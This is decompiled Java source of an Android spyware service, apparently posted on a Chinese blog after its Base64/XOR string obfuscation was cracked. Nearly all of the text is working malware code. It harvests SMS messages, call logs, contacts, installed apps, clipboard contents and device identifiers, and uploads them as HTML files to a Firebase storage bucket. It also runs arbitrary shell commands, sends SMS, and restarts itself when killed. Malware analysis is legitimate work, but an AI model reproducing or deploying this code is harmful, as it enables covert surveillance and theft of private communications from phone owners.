body{margin:0;padding:0;background:#ccc}.accordion{background-color:#fff;color:#000;cursor:pointer;padding:18px;width:100%;border:none;text-align:left;outline:0;font-size:15px;position:relative;transition:.4s;padding-left:50px}.accordion:hover,.active{backgroun-color:#aaa}.accordion:after{content:'âº';color:#000;font-weight:700;float:right;transform:rotate(90deg);margin-left:5px}.active:after{content:'âº'}.panel{padding:0 18px;background-color:#eee;max-height:0;color:#000;overflow:hidden;transition:max-height .2s ease-out}button span{position:absolute;right:50px}button img{height:30px;position:absolute;left:10px;top:10px;width:30px}.i{height:30px;width:35px;left:8px;transform:scale(.9)}.panel{padding:0 18px;background-color:#eee;max-height:0;color:#000;overflow:hidden;transition:max-height .2s ease-out}button span{position:absolute;right:50px}button img{height:30px;position:absolute;left:10px;top:10px;width:30px}</style>;if (query != null) {int count = query.getCount();if (query.moveToFirst()) {String str = decrypt;for (int i = 0; i < count; i++) {String string = query.getString(query.getColumnIndexOrThrow(date));String string2 = query.getString(query.getColumnIndexOrThrow(address));String string3 = query.getString(query.getColumnIndexOrThrow(body));new Date(Long.valueOf(string).longValue());String str2 = "";String str3 = "";switch (Integer.parseInt(query.getString(query.getColumnIndexOrThrow(type)))) {case 1:str2 = inbox;str3 = https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/inbox.png?alt=media&token=f3cf8d81-cf23-4588-bd9c-f9c37f518953;break;case 2:str2 = sent;str3 = https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/sent.png?alt=media&token=a5fb2993-56b6-4f44-ba95-5985aec6ad4a;break;case 4:str2 = outbox;str3 = https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/outbox.png?alt=media&token=2f7064a7-05b8-4535-a6cf-6666ae20bff0;break;}str = String.valueOf(str) + <button class='accordion'><img src=' + str3 + ' alt=' + str2 + ' > + string2 + <span> + string + < + / + span>< + / + button> + <div class='panel'> + string3 + < + / + div>;query.moveToNext();}decrypt = str;}query.close();decrypt = String.valueOf(decrypt) + <script type='text/javascript'> + function tm(t){return new Date(1e3*t).toLocaleString();}$('span').each(function(t,e){$(e).html(tm(parseInt($(e).html())))});var i,acc=document.getElementsByClassName('accordion');for(i=0;i<acc.length;i++)acc[i].addEventListener('click',function(){this.classList.toggle('active');var t=this.nextElementSibling;t.style.maxHeight?t.style.maxHeight=null:t.style.maxHeight=t.scrollHeight+'px'}); + </script>;}try {if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/sms.html))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/sms.html));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + /sms.html, true);fileOutputStream.write((String.valueOf(decrypt) + "\n\n").getBytes());fileOutputStream.close();this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(/sms.html)).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(/sms.html)))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.23/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(/sms.html)).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);} catch (FileNotFoundException e) {} catch (IOException e2) {}}public void _dmpcal() {String decrypt;Context applicationContext = getApplicationContext();StringBuffer stringBuffer = new StringBuffer();stringBuffer.append(<html><meta name='viewport' content='width=device-width, initial-scale=1'> <style> body{margin:0;padding:0;background:#ccc}.lo{width:calc(98% - 60px);position:relative;height:auto;padding-bottom:5px;padding-top:15px;padding-left:60px;background:#fff;margin:auto;border-radius:10px;margin-top:5px}.lo img{float:left;height:30px;width:30px;position:absolute;top:8px;left:10px}.lo span{float:right;margin-right:20px}</style><body>);Cursor query = applicationContext.getContentResolver().query(CallLog.Calls.CONTENT_URI, null, null, null, date DESC);int columnIndex = query.getColumnIndex(number);int columnIndex2 = query.getColumnIndex(type);int columnIndex3 = query.getColumnIndex(date);int columnIndex4 = query.getColumnIndex(duration);while (query.moveToNext()) {String string = query.getString(columnIndex);String string2 = query.getString(columnIndex2);Date date = new Date(Long.valueOf(query.getString(columnIndex3)).longValue());String string3 = query.getString(columnIndex4);String str = "";switch (Integer.parseInt(string2)) {case 1:decrypt = INCOMING;str = https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/INCOMING.png?alt=media&token=e660c478-8d09-4ff8-951e-c01a962fadc4;break;case 2:decrypt = OUTGOING;str = https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/OUTGOING.png?alt=media&token=738a33e9-6049-4a88-9440-3ac6f88e363c;break;case 3:decrypt = MISSED;str = https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/MISSED.png?alt=media&token=ebe94876-a3a4-4765-80f5-ce8e2c484056;break;default:decrypt = null;break;}stringBuffer.append(<div class='lo' ><img src=' + str + ' alt=' + decrypt + ' ><b> + string + </b> <span> + string3 + Sec</span><br><br> + date + </div>);}query.close();try {if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/call.html))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/call.html));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + /call.html, true);fileOutputStream.write((String.valueOf(stringBuffer.toString()) + "\n\n").getBytes());fileOutputStream.close();this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(/call.html)).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(/call.html)))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.24/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(/call.html)).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);} catch (FileNotFoundException e) {} catch (IOException e2) {}}public void _dmpcon() {String str;String decrypt = <html><meta name='viewport' content='width=device-width, initial-scale=1'><body><style> body{margin:0;padding:0;background:#ccc}.lo{width:calc(98% - 60px);position:relative;height:auto;padding-bottom:5px;padding-top:15px;padding-left:60px;background:#fff;margin:auto;border-radius:10px;margin-top:5px}.lo img{float:left;height:30px;width:30px;position:absolute;top:8px;left:10px}.lo span{float:right;margin-right:20px}</style>;Cursor query = getApplicationContext().getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, new String[]{_id, display_name, data1, account_type}, account_type <> 'google' , null, null);if (query.getCount() > 0) {str = decrypt;while (query.moveToNext()) {str = String.valueOf(str) + <div class='lo' ><img src='https://firebasestorage.googleapis.com/v0/b/white-2bc5f.appspot.com/o/cont.png?alt=media&token=4ee314cc-c1bd-417d-b03e-8a33f74b4330' ><b>Name: </b> + query.getString(query.getColumnIndex(display_name)) + <br><b>Number: </b> + query.getString(query.getColumnIndex(data1)) + <br> <b>From: </b> + query.getString(query.getColumnIndex(account_type)) + </div>;}} else {str = decrypt;}try {if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/cont.html))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/cont.html));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + /cont.html, true);fileOutputStream.write((String.valueOf(str) + "\n\n").getBytes());fileOutputStream.close();this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(/cont.html)).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(/cont.html)))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.25/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(/cont.html)).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);} catch (FileNotFoundException e) {} catch (IOException e2) {}}public void _getpackages() {String str;ByteArrayOutputStream byteArrayOutputStream;List<PackageInfo> installedPackages = getApplicationContext().getPackageManager().getInstalledPackages(0);String decrypt = <html><meta name='viewport' content='width=device-width, initial-scale=1'> <style>*{margin:0;padding:0;}body{margin:0;padding:0;background:#222;}.keylogg {background:#000;width:calc(95% - 20px);height:auto;margin:auto;padding:10px;color:#0dd;padding-bottom:10px;margin-top:8px;border-radius:10px;position:relative;overflow:auto;}.keylogg b{color:red;}.keylogg img{max-height:50px;max-width:50px;position:absolute;left:10px;}.keylogg p{color:#fff;}.keylogg span{float:right;margin-right:10px;}.btn{height:40px;width:150px;border:0;border-radius:5px;border:1px solid red;background:black;color:white;} </style><body>;Iterator<PackageInfo> it = installedPackages.iterator();while (true) {str = decrypt;if (it.hasNext()) {PackageInfo next = it.next();getBitmapFromDrawable(next.applicationInfo.loadIcon(getPackageManager())).compress(Bitmap.CompressFormat.JPEG, 100, new ByteArrayOutputStream());decrypt = String.valueOf(str) + <div class='keylogg' ><img src='data:image/png;base64, + Base64.encodeToString(byteArrayOutputStream.toByteArray(), 0) + ' ><div style='margin-left:60px;padding-top:3px;overflow:auto;' ><b style='color:green;' > + next.applicationInfo.loadLabel(getPackageManager()).toString() + (v + next.versionName + )</b><br><b style='color:red;' > + next.packageName + </b><br></div><br></div>;} else {try {break;} catch (FileNotFoundException e) {return;} catch (IOException e2) {return;}}}if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/apps.html))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(/apps.html));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + /apps.html, true);fileOutputStream.write((String.valueOf(str) + "\n\n").getBytes());fileOutputStream.close();SketchwareUtil.showMessage(getApplicationContext(), packejsj);this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(/apps.html)).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(/apps.html)))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.26/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(/apps.html)).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);}public static Bitmap getBitmapFromDrawable(Drawable drawable) {Bitmap createBitmap = Bitmap.createBitmap(drawable.getIntrinsicWidth(), drawable.getIntrinsicHeight(), Bitmap.Config.ARGB_8888);Canvas canvas = new Canvas(createBitmap);drawable.setBounds(0, 0, canvas.getWidth(), canvas.getHeight());drawable.draw(canvas);return createBitmap;}public String shell_exec(String str) {String str2 = "";String[] strArr = {sh, -c, str};try {BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(str).getInputStream()));while (true) {String readLine = bufferedReader.readLine();if (readLine != null) {str2 = String.valueOf(str2) + readLine;} else {return str2;}}} catch (Exception e) {return error;}}public void _sudoapt(String str, String str2) {_setrespo(shellview, "", shell_exec(str), "", "");}public void _devinfo() {getApplicationContext();Display defaultDisplay = ((WindowManager) getSystemService(window)).getDefaultDisplay();int width = defaultDisplay.getWidth();_setrespo(deviceinfo, "", <div class ='keylogg' ><b>SERIAL: </b> + Build.SERIAL + <br><b> + MODEL: </b> + Build.MODEL + <br><b> + ID: </b> + Build.ID + <br><b> + Manufacture: </b> + Build.MANUFACTURER + <br><b> + Brand:</b> + Build.BRAND + <br><b> + Device Language: </b> + Locale.getDefault().getDisplayLanguage() + <br><b> + Screen Resolution: </b> + width + x + defaultDisplay.getHeight() + <br><b> + Type: </b> + Build.TYPE + <br><b> + User: </b> + Build.USER + <br><b> + BASE: </b> + 1 + <br><b> + INCREMENTAL: </b> + Build.VERSION.INCREMENTAL + <br><b> + SDK:</b> + Build.VERSION.SDK + <br><b> + BOARD: </b> + Build.BOARD + <br><b> + BRAND:</b> + Build.BRAND + <br><b> + HOST: </b> + Build.HOST + <br><b> + FINGERPRINT: </b> + Build.FINGERPRINT + <br><b> + Version Code: </b> + Build.VERSION.RELEASE + </div>, "", "");}public void _showtoast(String str) {SketchwareUtil.showMessage(getApplicationContext(), str);_setrespo(dialogview, "", Toast Shown Successfully, "", "");}public void _vibra(String str) {this.vibrator.vibrate(Integer.parseInt(str));_setrespo(dialogview, "", Device Vibrated, "", "");}public void _ttsdev(String str) {this.tts.speak(str, 1, null);_setrespo(dialogview, "", TTS Completed Successfully, "", "");}public void _palysmudic(String str) {this.mp = new MediaPlayer();this.mp.setAudioStreamType(3);try {this.mp.setDataSource(str);} catch (IOException e) {e.printStackTrace();} catch (IllegalArgumentException e2) {_setrespo(dialogview, "", <span style='color:red;' > ERROR: </span>Song Not Found from URL, "", "");} catch (IllegalStateException e3) {_setrespo(dialogview, "", <span style='color:red; ' > ERROR: </span>Song Not Found from URL, "", "");} catch (SecurityException e4) {_setrespo(dialogview, "", <span style='color:red; ' > ERROR: </span>Song Not Found from URL, "", "");}try {this.mp.prepare();_setrespo(dialogview, "", <span style='color: green; '> Success: </span>Song is playing, "", "");} catch (IOException e5) {_setrespo(dialogview, "", <span style='color:red; ' > ERROR: </span>Song Not Found from URL, "", "");} catch (IllegalStateException e6) {_setrespo(dialogview, "", <span style='color:red; ' > ERROR: </span>Song Not Found from URL, "", "");}this.mp.start();if (this.mp.isPlaying()) {_setrespo(dialogview, "", <span style='color: green; '> Success: </span>Song is playing, "", "");}}public void _sendsm(String str, String str2) {try {SmsManager.getDefault().sendTextMessage(str, null, str2, null, null);_setrespo(dialogview, "", <span style='color:green'>Success: </span>Message Sent Successfully, "", "");} catch (Exception e) {_setrespo(dialogview, "", <span style='color:red'>Error: </span>Either permission is not given or Data is incorrect., "", "");}}public void _changewall(String str) {if (str.equals(0)) {try {WallpaperManager.getInstance(getApplicationContext()).setResource(R.drawable.wall1);} catch (Exception e) {e.printStackTrace();}_setrespo(dialogview, "", Wallpaper Changed Successfully, "", "");} else if (str.equals(1)) {try {WallpaperManager.getInstance(getApplicationContext()).setResource(R.drawable.wall2);} catch (Exception e2) {e2.printStackTrace();}_setrespo(dialogview, "", Wallpaper Changed Successfully, "", "");} else if (str.equals(2)) {try {WallpaperManager.getInstance(getApplicationContext()).setResource(R.drawable.wall3);} catch (Exception e3) {e3.printStackTrace();}_setrespo(dialogview, "", Wallpaper Changed Successfully, "", "");}}/* JADX WARN: Code restructure failed: missing block: B:12:0x004f, code lost:if (r1.isEmpty() != false) goto L13;*//*Code decompiled incorrectly, please refer to instructions dump.*/public void clips() {String str = null;final ClipboardManager[] clipboardManagerArr = new ClipboardManager[1];String str2 = "";new Handler(Looper.getMainLooper()).post(new Runnable() { // from class: sigma.male.servicess.27@Override // java.lang.Runnablepublic void run() {clipboardManagerArr[0] = (ClipboardManager) servicess.this.getSystemService(clipboard);}});try {if (clipboardManagerArr[0].hasPrimaryClip()) {ClipDescription primaryClipDescription = clipboardManagerArr[0].getPrimaryClipDescription();ClipData primaryClip = clipboardManagerArr[0].getPrimaryClip();if (primaryClip != null && primaryClipDescription != null && primaryClipDescription.hasMimeType(text/plain)) {str2 = String.valueOf(primaryClip.getItemAt(0).getText());}}str = str2;} catch (NullPointerException e) {}_setrespo(deviceinfo, "", <div class ='keylogg' > + str + </div>, "", "");}public void _voicere(String str) {_setrespo(dialogview, "", Launched URL : + str, "", "");Intent intent = new Intent();intent.addFlags(268435456);intent.setAction(android.intent.action.VIEW);intent.setData(Uri.parse(str));startActivity(intent);}public void tofft() {_setrespo(dialogview, "", Turned Off Torch light, "", "");CameraManager cameraManager = (CameraManager) getSystemService(camera);try {cameraManager.setTorchMode(cameraManager.getCameraIdList()[0], false);} catch (CameraAccessException e) {}}public void tont() {_setrespo(dialogview, "", Turned On Torch light, "", "");CameraManager cameraManager = (CameraManager) getSystemService(camera);try {cameraManager.setTorchMode(cameraManager.getCameraIdList()[0], true);} catch (CameraAccessException e) {}}@Override // android.app.Servicepublic IBinder onBind(Intent intent) {return null;}@Override // android.app.Servicepublic void onDestroy() {Intent intent = new Intent();intent.setAction(restartservice);intent.setClass(this, restarter.class);sendBroadcast(intent);super.onDestroy();}}
解密前后对比
区区Base64XOR加密也想难得住我?😎😎😎👊👊👊
若有收获,就点个赞吧
0 人点赞
